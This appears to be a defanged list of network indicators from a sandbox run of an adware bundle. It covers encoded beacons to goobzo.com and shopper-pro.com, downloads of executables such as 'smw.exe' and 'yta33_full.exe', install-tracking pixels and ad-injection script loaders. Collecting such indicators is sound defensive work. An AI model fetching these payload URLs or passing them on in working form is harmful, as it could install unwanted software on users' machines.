    hxxp://stub.goobzo.com/p.ashx?e=blUJ6JGwk9JN39k7Xfv8ZV9Aufo681yTjA5kVqVgWdAgLxC0aXqYrfeVKhATcvrDNnjgeuHGNQp4nJxtavSnm1i2s6XsF8NYDbIMzp3umKKLXU1phjFw2QjYjXjSiKQCX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8WY515bwKb4/A== 54.208.92.111
    hxxp://stub.goobzo.com/p.ashx?e=WL9usJOVMsMN1MB2JYZLYrHbi1p4ZxnmE13rHoa9hTh4E7mrr1h80mWrS5fBjo9G haUlwXCC3x4l/6pRDWome K9V0GRRESrStpyyCRN5wE8SFHLIEPsIrbCKwGMe5Y4VTmYx8DZjA8oxErH8fL5pgPXGLp3QYEb98NyY 3Jv/oKdNf4wHzMG0hjZa1YiVe HfvMJQtwAnvnQunoWavo1O8xmMRVWZOb7j5JAyiJ5DwvGnwcuiCjBHn3WtPO7Tk 54.208.92.111
    hxxp://stub.goobzo.com/p.ashx?e=WL9usJOVMsMN1MB2JYZLYrHbi1p4ZxnmE13rHoa9hTh4E7mrr1h80mWrS5fBjo9G haUlwXCC3x4l/6pRDWome K9V0GRRESzprDiolRFccz/yeZN BbCCmF904v4t2DsX3/aWOzPqONmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciwyyzTF2Y0WVu 54.208.92.111
    hxxp://stub.goobzo.com/p.ashx?e=WL9usJOVMsMN1MB2JYZLYrHbi1p4ZxnmE13rHoa9hTh4E7mrr1h80mWrS5fBjo9G haUlwXCC3x4l/6pRDWome K9V0GRRESzzzSAUigcDOBH7l0Cnb62dCUHeR8YCF3HUDXrv0Zk8ASGzXJG4Eokf4VYfpEwhPiF9IEmN/K55dAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JoXwql6nKegU 54.208.92.111
    hxxp://stub.goobzo.com/p.ashx?e=WL9usJOVMsMN1MB2JYZLYrHbi1p4ZxnmE13rHoa9hTh4E7mrr1h80mWrS5fBjo9G haUlwXCC3x4l/6pRDWome K9V0GRRESgu0rCkTVQ8byyO6Ebs4xmkKABP6K/iqqErQGcrZAOeGNEtZ1sX9mVGQej1hJL//7q rbptvtlqMuTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHG6KihZpGgAn 54.208.92.111
    hxxp://mag.goobzo.com/install.ashx?e=uWabAt9SLcwd5zMhdw4gNj7xT0yTfiTDeyEWuAbI0Nvev3l2qMnrnXYyEmQr8/O1yozh0ljnbVDFKzsac0RwM9aJmYbuXbKETzF53EHpwgtyRdUuNvgXmvi3lPIsTTKVy2j7DbiIccdKk0WHcpGM5/1Lsbrv Iy0INwgr2WUatpnX4zrIosQHvq5/0VwNzjIimCwuG1Q3go1K6uMI0cA8bOS1vYD9DbWM3NREWq8wbENEkDdepZg8iYeApy3zoidhXbusBDt62mNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciwyyzTF2Y0WVu
    hxxp://stub.goobzo.com/p.ashx?e=WL9usJOVMsMN1MB2JYZLYrHbi1p4ZxnmE13rHoa9hTh4E7mrr1h80mWrS5fBjo9G haUlwXCC3x4l/6pRDWome K9V0GRRESWOmrCoYyvl0E8SFHLIEPsCulakfvQngeO50oLgZRN2KyncvP/Aj8LY2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDLLNMXZjRZW4= 54.208.92.111
    hxxp://stub.goobzo.com/p.ashx?e=WL9usJOVMsMN1MB2JYZLYrHbi1p4ZxnmE13rHoa9hTh4E7mrr1h80mWrS5fBjo9G haUlwXCC3x4l/6pRDWome K9V0GRRESrStpyyCRN5x7ym41MswgnBQC drCF7eFiSXUoJ39wxGjbYuukLQCoXwPQ5gP4GDmLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBxuiooWaRoAJw== 54.208.92.111
    hxxp://mag.goobzo.com/t.ashx?e=jJl6mEdycnQ 8U9Mk34kw1YtpnRz6OBdQF3UKsSdb2sOPTZ1h4Q6LUVho8rxvim7NGnZb0Aap XZAzLabjw6T2AqR2XPWVGhi24b6K/4pIUUAvnawhe3hcrFg62ocRzdxNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi fl6ZL2NeMWCfA==
    hxxp://stub.goobzo.com/p.ashx?e=aQQpsP6/AW3U0UsIWSR1jaShngkjl6Wn7OXLse4BafSePFQUn2Ibrb6Gb8KFABTw0I GKFrrI062Zgsasucq3OoYmyje41WxTJe1GQ MRj50TBvNdroHSbLRD/MFmTIYRWGjyvG Kbs0adlvQBqn5d37ZJy NkuaYCpHZc9ZUaGGezoD1qtkebhzXK2mWcezxLLCQXXwGXyfgz4Wx8XBMyQ 5eGHwhJ7xNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FK6VCsNuKBiir8uE40O0xGz4zJfSwDmmmLcb2RMdMffP3LkO87mF5Z0g== 54.208.92.111
    hxxp://stub.goobzo.com/p.ashx?e=aQQpsP6/AW3U0UsIWSR1jaShngkjl6Wn7OXLse4BafSePFQUn2Ibrb6Gb8KFABTw0I GKFrrI062Zgsasucq3OoYmyje41WxTJe1GQ MRj50TBvNdroHSbLRD/MFmTIYRWGjyvG Kbs0adlvQBqn5d37ZJy NkuaYCpHZc9ZUaFXs9sbgOmK8XSpt9GSHWXQpjurIyC9QLCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0Zhyze53cwABqbvzvuecEvvoV 3l7LlOf9f0898E/SBG0B991fXLZafzwI 54.208.92.111
    hxxp://stub.goobzo.com/p.ashx?e=k64GogClQtU 8U9Mk34kw/yNKERWcmikQF3UKsSdb2vwmjpruFCyhX5dMiu8MPG01B6YeMqi Im/qdRJpdu7mSHo7XGg4zZbCvnBFMNFCylGWU7gz wA0swGIbO2JyH/2oW7UKZaCDjhCmRuZ7WprJ7TtIX8b4qVV9lf0hTetO1oT5C62qh05tCUHeR8YCF3egGeWRl96bH2oAxl1mhtveUQN84Hz3rwniLkiNQiEIG07vMSOQOxGVl64 mVHwG YSrViaugUztufIAI6WL2lImkToQE5nQmvfvOiTlw65KWRoYetJhI8EvYQcB047WXU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2r56EmzsP6UAbrZvJ7les BWCHtMDhAbGax DpF9NlexmV95JLFrqAJKwJoUkgeXWg== 54.208.92.111
    hxxp://stub.goobzo.com/p.ashx?e=VlXRKcYhvMZN39k7Xfv8ZQQrK49K1Uf9jA5kVqVgWdDiWMa2QsVMWSEdbCsTxXU3wevOyHMrUv7dPpuGYiwKKAUjnBK5teTHDSzCAjSAeoQ/JbFmSKXuki6W6A2stOLbVQy9/aflzjqoAmQHyIej2lLthe3E5HJFAhTD7v1xeC4pGvADS7bOhn9QQGOCx A1cdUGYiS9T3gaW6ev41W4C0COCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZUJF8t7lKmIud4879GQUXL/flUKwD azUc94dAxwtdUOzX1Gx nY/ao= 54.208.92.111
    hxxp://stub.goobzo.com/p.ashx?e=eISsn0A7mAaebxLgvS5H7tZgHY49gcCUCIsqLvtsfMf8ln8Iap23/86yhOERrUppUA7dl9owwhK3G2s59l7sl5cZvAfHQnSa7kaOF pd5SUvlUNMetnoY0zIpvq0RRcJlQw8J vYOFWqQjerOGqsHsvrf4q/fSIg54ebh5tiGXex2KlVs8m8LqSlVGmgAnwD/CamQonQoAdJZRjG3TGo2o2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLN7ndzAAGpu/O 55wS hX7eXsuU5/1/Tz3wT9IEbQH33V9ctlp/PAg= 54.208.92.111
    hxxp://stub.goobzo.com/p.ashx?e= 0m13SthQps 8U9Mk34kw8QS2RgqxlKpQF3UKsSdb2vwmjpruFCyhX5dMiu8MPG01B6YeMqi Im/qdRJpdu7mSHo7XGg4zZbCvnBFMNFCylGWU7gz wA0swGIbO2JyH/2oW7UKZaCDjhCmRuZ7WprNUozDc7RPfSdUOgYS KH2EUAvnawhe3hey0PnzBt51Djaca1IHJKONfoAFDjGX4LpcCZEAFRuZJhEDlb5EunAiguPxY3sIjxUlalNSF2h61sBCEmBDvTUsU/wxlH/T7FVXwqVIKbqJg38AnGKh2b/Oj3O6v5lgVxEr5pf74WHLE 54.208.92.111
    hxxp://stub.goobzo.com/p.ashx?e= 0m13SthQps 8U9Mk34kw8QS2RgqxlKpQF3UKsSdb2vwmjpruFCyhX5dMiu8MPG01B6YeMqi Im/qdRJpdu7mSHo7XGg4zZbCvnBFMNFCylGWU7gz wA0swGIbO2JyH/2oW7UKZaCDjhCmRuZ7WprNUozDc7RPfS6veuaYiF5bUUAvnawhe3hcrFg62ocRzdxNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FK6VCsNuKBiir8uE40O0xGz4zJfSwDmmmLcb2RMdMffP3LkO87mF5Z0g== 54.208.92.111
    hxxp://stub.goobzo.com/p.ashx?e= 0m13SthQps 8U9Mk34kw8QS2RgqxlKpQF3UKsSdb2vwmjpruFCyhX5dMiu8MPG01B6YeMqi Im/qdRJpdu7mSHo7XGg4zZbCvnBFMNFCylGWU7gz wA0swGIbO2JyH/2oW7UKZaCDjhCmRuZ7WprNUozDc7RPfSeKRzCupNECsE8SFHLIEPsM3UKcKGG9ndLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBwLgrSkZSFaNnd/rihenux9U3S8esvLqwTmK3k1EAs6sfLoPddIkY3WBttGDaJRbHKVhqCc1dyL3A== 54.208.92.111
    hxxp://stub.goobzo.com/p.ashx?e= 0m13SthQps 8U9Mk34kw8QS2RgqxlKpQF3UKsSdb2vwmjpruFCyhX5dMiu8MPG01B6YeMqi Im/qdRJpdu7mSHo7XGg4zZbCvnBFMNFCylGWU7gz wA0swGIbO2JyH/2oW7UKZaCDjhCmRuZ7WprNUozDc7RPfSCFk3XNAVUc7IYlr SWvBW7PiCC4paVhdbnp1XaZJ5KlgwvRa16pLqmxyOCGsbcxpeUIGadR1XBkklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEukCI5CZ2WmqAll3fTsajgGYMVIw7RC6ErYt1 5zlXVo5WT24lsyMUdcjVmlmgA9lM= 54.208.92.111
    hxxp://d177dk26a4y9jb.cloudfront.net/object-browser10.exe 54.240.190.153
    hxxp://d3bg798gjlk71j.cloudfront.net/yta33_full.exe 54.230.55.250
    hxxp://d13s98z2lzti92.cloudfront.net/smw.exe 54.230.52.78
    hxxp://d177dk26a4y9jb.cloudfront.net/ShopperProJSFull.exe 54.240.190.153
    hxxp://d13s98z2lzti92.cloudfront.net/iwebar2.exe 54.230.52.78
    hxxp://d13s98z2lzti92.cloudfront.net/sense7.exe 54.230.52.78
    hxxp://rep.shopper-pro.com/app/ping.ashx?e=QgW8pN5r26bG3E YywYlU3f2Ttd /xl xYuH J FObZhN5o5pkk8XKxIhAz9Yyqxh8Nod/d7v1zgXkPiNglaWs6fOuor3FnHdLO8X QXbr lPuSoguSWxrRu4kWrXNynl1xOKDZuhV32iCW81wbGIKsBnpxnODFqF2K7v3Wx4ONmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw136MSsEaSIOanTjS7v eG62Zgsasucq3OoYmyje41WxTJe1GQ MRj50TBvNdroHSdoYj746suyshjZ3jwf MfnewapHV13X4JiBsOrYTKodleI3B6uYg8lqpwuyqc3XiTEOgAi5qcHFTOb4ld8V/hpKFlcuSjxCVQ== 54.197.238.106
    hxxp://rep.shopper-pro.com/app/ping.ashx?e=jJl6mEdycnQ 8U9Mk34kw7XExPxaOtUo 0R MP RL3UJOLXkS9L/hwjFxjCJ4rJf9G51DmHdBK7t7iAM5gjoAOfZECWycqr1J2AXz3DUAfeiVKmshyeUoVQbGQSUykHd9w5jaz3mQl4Nllnu1l1OaS3QPqxzrS768NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFawUbmkSx2157cbazn2XuyXlxm8B8dCdJruRo4X6l3lJS VQ0x62ehjDtq1bhwHABa r7NiSQEydOFU5mMfA2YwPKMRKx/Hy aYD1xi6d0GBG/fDcmPtyb/6CnTX MB8zBtIY2WtWIlXvh37zCULcAJjU0tqMnFrjE= 54.197.238.106
    hxxp://rep.shopper-pro.com/app/ping.ashx?e=jJl6mEdycnQ 8U9Mk34kw7XExPxaOtUo 0R MP RL3UJOLXkS9L/hwjFxjCJ4rJf9G51DmHdBK7t7iAM5gjoAOfZECWycqr1Z18OnkUdu7xEOSUa7Yc3q/tSqyRFQDmNQo1niQhmz6uvbe1EY5FvJ2p040u7/nhutmYLGrLnKtzqGJso3uNVsUyXtRkPjEY dEwbzXa6B0mlKK9UPlQ5p3VDt5v69KnXUp6IEQMqXjdV4mPrhpbEZ5iUvwkrSyY3sqfoz2uHEz1UMgf1RchOnpAvYXSGDVGJe0b37/par5UWUV8ePZ0Sdc67jG ds7hv51kSquqcSceqsk5wIEKmVWDyyarmb um8WhF3ugr H9AjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF Jihgvev7iJ046K60oDM11bbdPpuGYiwKKAUjnBK5teTHDSzCAjSAeoSV Ydh9Uq5zKgLBmWbNzqz9A8dpvtBeO2hc3DbjNrW8PhalNGReGDudXf8s99rZqrmh5G7kLgKqRaV67pS3nBkkuGbiMqeAsg9JWacyDbfAA== 54.197.238.106
    hxxp://rep.shopper-pro.com/app/ping.ashx?e=eFCD8T/coicfJBuEXOGPjV6COREN73glt8f6YpiR28IQ9XpMu3JNON2W/aep YyrKB9qcQmkVohnIGJDPNlC0ZmJRQOaX BeiViAEPFo6Yp/1ErfmLF8//Y1HJKKgNFG88zk3vjcmKQHI/73rKtKuS5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAc/1td01976VDm/QXz8xtqS6Q9fvZLzhpPHqZTozeGZkFDIYxMHAAwfsy37oES63mGJkwA4PeZyrqoiz5XsOzoJG5lkiLn 2iON4UrLMQQDZPMFopdoQp3MXCrArhn8sH AS7DCm3ZJZeNpBJRUpe7bX0UJxZodl69 54.197.238.106
    hxxp://rep.shopper-pro.com/app/ping.ashx?e=K24uUiBczqc4DPBd3om9l6G6A4KkaYqgTEgCpOx0T0GQL2F0hg1RiVC6b dx5TQKxdj9frAO5TaGZ4n6lxkuym3bGUKC6SiUtYRRGpvjKZmzjXrgYJQKsUCndBhIJGn5Gl3VMfCFqNT669uXeODcaV gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFDMWtlnh6ykc2DJ5K4X8Fo xaJ0pFBf0UClEX4xyKyvfczJCAMREbP9pGE7GNaKd5p59GYA8 MxkEchBIBSL pnq6LeO//ew/cRstaZMh7oc9Jm6LOUplLi9UaJ0lDNBvBxfXneO6iyXLvPTXiM8YeL1JXfzjhvHW 54.197.238.106
    hxxp://rep.shopper-pro.com/app/ping.ashx?e=XOxRKBm2zlwfJBuEXOGPjV6COREN73glt8f6YpiR28IQ9XpMu3JNON2W/aep YyrKB9qcQmkVohnIGJDPNlC0ZmJRQOaX BeqUVvKp9Lg9WpU9MRQHad4Zw4LO6ub5l59bC43VoLO9Fqkk05UZLhCDj6H2BIqEzZsYns0spGP2dTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05PNsA1iuxLaBRirCalL7cUW/qdRJpdu7mSHo7XGg4zZbCvnBFMNFCynVX9FrZDjoUWCdwiLZyE1Pd6j7/wRBDsRoqvWX6JwkejqMehRdfaX6iZYn8TH3Pe3MlW9RFqOniqVRDsrPlqwdmkLLb35jLfrVLutmednZNQ== 54.197.238.106
    hxxp://rep.shopper-pro.com/app/ping.ashx?e=XOxRKBm2zlwfJBuEXOGPjV6COREN73glt8f6YpiR28IQ9XpMu3JNON2W/aep YyrKB9qcQmkVohnIGJDPNlC0ZmJRQOaX BegJHDf/u7xkS731F411UHVh6RoJ10TU0sX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8UMxa2WeHrKRzYMnkrhfwWj7FonSkUF/RQKURfjHIrK99zMkIAxERs/2kYTsY1op3mnn0ZgDz4zGQRyEEgFIv6merot47/97D9xGy1pkyHuhz0mbos5SmUuL1RonSUM0G8HF9ed47qLJcu89NeIzxh4vUld/OOG8dY= 54.197.238.106
    hxxp://stub.goobzo.com/p.ashx?e=hNMAVKhukrxQ7vT6UlpXS7Hbi1p4Zxnm/grZOB60hz54E7mrr1h80nCV2BSzkbCw3e14SYwGceQTCpS94p21WHD3jm6PAwKvD3T7xkgH4O7LOCiWPl5k0lsyL1Cw9OzrwaZOKGJlrs512zlOrqcKdHUXUX1nbdYdyaU4yQDac8mFzoNt4Ofsjzs1eJiiYYwojgb6v7cXpPuhdSzxiLx/vMc4 zvT5ptYH5QQ4/ v61o8Zai3MsiwQAfZFku3V2enpSLERfTF/PAjtuufyo2/uPPP1z34ZOLgImtRhO55fOmUGQZ 6XGOUbLIF B0L8w8xNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi flruyvHL/XTRfTbXnzkx FK6VCsNuKBiir8uE40O0xGz4zJfSwDmmmLcb2RMdMffP3LkO87mF5Z0g== 54.208.92.111
    hxxp://searchsh.goobzo.com/br.ashx?pid=%s&aid=%s&ss=0&s=E64wlimyu1,74261409-fb54-436c-b597-1b09ef03540d,&v=2.1.0.81&md5=05437b33cd427eacecabaaf96df7a3f9&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=F86D41BF-D1A5-4690-A216-28E5FBCF949C
    hxxp://cds.d5k9g9i8.hwcdn.net/installer_updates/000046/update.json
    hxxp://cds.d5k9g9i8.hwcdn.net/installer_updates/000169/update.json
    hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_12&bic=7F1D95218D1E4CF487AAD4B2A3E48467IE&app=32850&appver=0&verifier=1121c510e5f38d154df47b19458d540e&srcid=000046&version_date=21-05-14&subid=0&zdata=0&xpiver=0_94&crxver=0&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179873281&asw=0&asw2=8704&asw3=&procstarttime=1401908094&procruntime=4&rnd=1401908098
    hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_12&bic=92F4CE5DE43B4200BD216411591F0444IE&app=35510&appver=0&verifier=cf88a6e798062720061920ae8ad681d4&srcid=000169&version_date=21-05-14&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJFNjR3bGlteXUxLDc0MjYxNDA5LWZiNTQtNDM2Yy1iNTk3LTFiMDllZjAzNTQwZCwiLCJ1bnEiOiI3NDI2MTQwOS1mYjU0LTQzNmMtYjU5Ny0xYjA5ZWYwMzU0MGQifX0=&xpiver=0_94&crxver=0&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179873281&asw=0&asw2=8704&asw3=&procstarttime=1401908096&procruntime=2&rnd=1401908098
    hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?event=3&ibic=92F4CE5DE43B4200BD216411591F0444IE&verifier=cf88a6e798062720061920ae8ad681d4&campaign=000169&app=35510&bhover=1_34_05_12&xpiver=0_94&crxver=0&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1401908096&asw=00000000000000000000000000000000&asw2=00000000000000000010001000000000&asw3=00000000000000000000000000000000&browser=ie,de
    hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?event=3&ibic=7F1D95218D1E4CF487AAD4B2A3E48467IE&verifier=1121c510e5f38d154df47b19458d540e&campaign=000046&app=32850&bhover=1_34_05_12&xpiver=0_94&crxver=0&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1401908094&asw=00000000000000000000000000000000&asw2=00000000000000000010001000000000&asw3=00000000000000000000000000000000&browser=ie,de
    hxxp://cds.d5k9g9i8.hwcdn.net/installer_updates/000803/update.json
    hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_12&bic=4252D7B4B8E54E2E95F19018ADCF24D9IE&app=48292&appver=0&verifier=06a66a2d5edd8e17cc634fade0ffd159&srcid=000803&version_date=21-05-14&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJFNjR3bGlteXUxLDc0MjYxNDA5LWZiNTQtNDM2Yy1iNTk3LTFiMDllZjAzNTQwZCwiLCJ1bnEiOiI3NDI2MTQwOS1mYjU0LTQzNmMtYjU5Ny0xYjA5ZWYwMzU0MGQifX0=&xpiver=0_94&crxver=1_26_55&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8397312&asw3=&procstarttime=1401908103&procruntime=2&rnd=1401908105
    hxxp://searchsh.goobzo.com/wu.ashx?dsid=1&s=E64wlimyu1,74261409-fb54-436c-b597-1b09ef03540d,&v=2.1.0.81&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&usetmd5=&bmd5=&hpp=1&spp=1&ntp=1
    hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?ibic=4252D7B4B8E54E2E95F19018ADCF24D9IE&verifier=06a66a2d5edd8e17cc634fade0ffd159&campaign=000803&event=11&app=32850&pubdetected=false&procstarttime=1401908103
    hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?event=3&ibic=4252D7B4B8E54E2E95F19018ADCF24D9IE&verifier=06a66a2d5edd8e17cc634fade0ffd159&campaign=000803&app=48292&bhover=1_34_05_12&xpiver=0_94&crxver=1_26_55&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1401908103&asw=00000000000000000000000000000000&asw2=00000000100000000010001000000000&asw3=00000000000000000000000000000000&browser=ie,de
    hxxp://cds.d5k9g9i8.hwcdn.net/omaha/A411BEAA-C1B6-41C1-96DE-301C4C62F5AD/1/ping.xml?rand=24746
    hxxp://searchsh.goobzo.com/br.ashx?pid=%s&aid=%s&ss=0&s=E64wlimyu1,74261409-fb54-436c-b597-1b09ef03540d,&v=2.1.0.81&md5=3b456ea93c832f8b2dadec75b7f745f8&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=F86D41BF-D1A5-4690-A216-28E5FBCF949C
    hxxp://a26.d.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt
    hxxp://e6845.ce.akamaiedge.net/ThawteTimestampingCA.crl
    hxxp://searchsh.goobzo.com/br.ashx?pid=%s&aid=%s&ss=0&s=E64wlimyu1,74261409-fb54-436c-b597-1b09ef03540d,&v=2.1.0.81&md5=30bd13dc44da9e3ff75fb2ebf299b42f&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=F86D41BF-D1A5-4690-A216-28E5FBCF949C
    hxxp://e6845.ce.akamaiedge.net/tss-ca-g2.crl
    hxxp://searchsh.goobzo.com/br.ashx?pid=%s&aid=%s&bur=1&ss=0&s=E64wlimyu1,74261409-fb54-436c-b597-1b09ef03540d,&v=2.1.0.81&md5=30bd13dc44da9e3ff75fb2ebf299b42f&mid=A0A7AiA9A7AAA1AiA7ieA1A91J7L773DiLAiiAA13D1J&uid=F86D41BF-D1A5-4690-A216-28E5FBCF949C
    hxxp://s3-website-us-east-1.amazonaws.com/stats.gif?action=daily&app=32850&bic=7F1D95218D1E4CF487AAD4B2A3E48467IE&ibic=7F1D95218D1E4CF487AAD4B2A3E48467IE&verifier=1121c510e5f38d154df47b19458d540e&ver=1_34_05_12&installtime=1401908094&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=000046&campaign=000046&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=197&bgver=1&pluginsver=161&curtime=1401908094&lifetime=0&rnd=8734
    hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/32850/manifest/1_34_05_12/ie6/manifest.xml?ver=197&rnd=7542
    hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/32850/js/na/ie/app_code.js?ver=200&rnd=6387
    hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/32850/plugins/na/ie/plugins.json?ver=164&rnd=4320
    hxxp://s3-website-us-east-1.amazonaws.com/stats.gif?action=daily&app=35510&bic=92F4CE5DE43B4200BD216411591F0444IE&ibic=92F4CE5DE43B4200BD216411591F0444IE&verifier=cf88a6e798062720061920ae8ad681d4&ver=1_34_05_12&installtime=1401908096&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=000169&campaign=000169&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=268&bgver=1&pluginsver=133&curtime=1401908096&lifetime=0&rnd=514
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/monetization/geo/bpo_intext_m.js?ver=1&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/javascripts/monetization/geo/adextent_m.js?ver=1&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/monetization/geo/similar_products_m.js?ver=20&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/monetization/monetizationLoader.js?ver=51&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/monetization/geo/dealply_m.js?ver=8&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/monetization/geo/superfish_no_coupons_m.js?ver=12&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/stats/ie.js?ver=1&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/monetization/setup.js?ver=12&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/35510/manifest/1_34_05_12/ie6/manifest.xml?ver=268&rnd=6271
    hxxp://cds.d5k9g9i8.hwcdn.net/omaha/06F9C542-63CA-47A4-A81F-3B5E3594D3A6/1/ping.xml?rand=24785
    hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/35510/js/na/ie/app_code.js?ver=278&rnd=9347
    hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/35510/plugins/na/ie/plugins.json?ver=137&rnd=9679
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/monetization/geo/price_gong_m.js?ver=3&rnd=41
    hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=update&app=32850&bic=92F4CE5DE43B4200BD216411591F0444IE&verifier=cf88a6e798062720061920ae8ad681d4&ver=1_34_05_12&installtime=1401908094&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=000046&subid=0&zdata=0&appver=200&bgver=1&pluginsver=164&curtime=1401908122&lifetime=28&oldappver=197&oldbgver=1&oldpluginsver=161&rnd=9805
    hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=update&app=35510&bic=92F4CE5DE43B4200BD216411591F0444IE&verifier=cf88a6e798062720061920ae8ad681d4&ver=1_34_05_12&installtime=1401908096&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=000169&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJFNjR3bGlteXUxLDc0MjYxNDA5LWZiNTQtNDM2Yy1iNTk3LTFiMDllZjAzNTQwZCwiLCJ1bnEiOiI3NDI2MTQwOS1mYjU0LTQzNmMtYjU5Ny0xYjA5ZWYwMzU0MGQifX0=&appver=278&bgver=1&pluginsver=137&curtime=1401908122&lifetime=26&oldappver=268&oldbgver=1&oldpluginsver=133&rnd=7666
    hxxp://cds.d5k9g9i8.hwcdn.net/omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=24801
    hxxp://rep.shopper-pro.com/app/ping.ashx?e=KC46TpkJIZzvtemz1TdLVuWnbh8hpWrAeq10/GADmDBu89fJv3K/CWQ14on7GBy1f82ojUnVmk1jg4jhBREgIvCV4d3G7GmUPoZDv5/7A 4Cbsn9VEgrCHCV2BSzkbCw3e14SYwGceQTCpS94p21WHD3jm6PAwKvD3T7xkgH4O7LOCiWPl5k0ouHKS7KUiLNWuHFN9lRYXm3sb/Jc9bi4CY6tkU PjWGlHVWy8T0I6XgvyObhcmYFVDq65iJ/PSiZue/pvWoG6/w1VxvH51bFJF4kQIHXTAmjFaC1iN6TTGCGrpHNYuwVp3jd05TL7uAHr0KKVswpUMOZdMqy4QvCJDBHj1HSSAn7FonSkUF/RQKURfjHIrK99zMkIAxERs/2kYTsY1op3mQo22RHlSfKyHVloWsfii4 54.197.238.106
    hxxp://online.goobzo.com/online/Register.aspx?CV=2.0.0.0&ProductID=12000&UserID=&Password=&OS=5&EMail=&Newsletter=&V=3.3.9.4&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList= 212.143.22.214
    hxxp://cds.d5k9g9i8.hwcdn.net/omaha/DD1B4183-F36A-4489-9A68-4205A6801149/1/update.xml?rand=24808&w=3:YP9H98JGonPq-z8K8ZDNEoBZF0_1DKLBOVchsmR1rKhzvo080SvcrbvVqO024phbkOXhv8Oj8EjHaL0anoDmMXwRuezydLQrfC6FVKLMOqXspCJqg8Sq6V9oCpSjkralK86J5UI4Ao4LnhS5nqLPx1I9muwRfYQ3SIN5JeFyDjE
